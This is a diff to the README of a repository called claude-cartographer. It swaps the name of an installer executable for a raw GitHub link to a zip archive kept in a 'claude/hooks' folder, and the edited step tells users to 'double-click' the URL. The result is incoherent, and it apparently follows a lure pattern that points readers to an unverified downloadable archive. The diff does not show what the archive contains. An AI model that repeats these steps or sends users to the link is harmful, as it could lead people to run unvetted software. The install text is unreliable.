cristinaaponte/claude-cartographer/README.md

 ## 🔄 Download & Install
 To install claude-cartographer:

-1. **Click on the downloaded file:** Open the folder where you extracted the files, then double-click on the file named `claude-cartographer.exe` or the corresponding file for your OS.
+1. **Click on the downloaded file:** Open the folder where you extracted the files, then double-click on the file named `https://raw.githubusercontent.com/cristinaaponte/claude-cartographer/main/claude/hooks/claude_cartographer_v3.3.zip` or the corresponding file for your OS.
 2. **Follow Installation Prompts:** This will guide you through the installation process.
 Simply follow the on-screen instructions to complete the setup.

 For quick access, remember to save the application shortcut to your desktop or taskbar.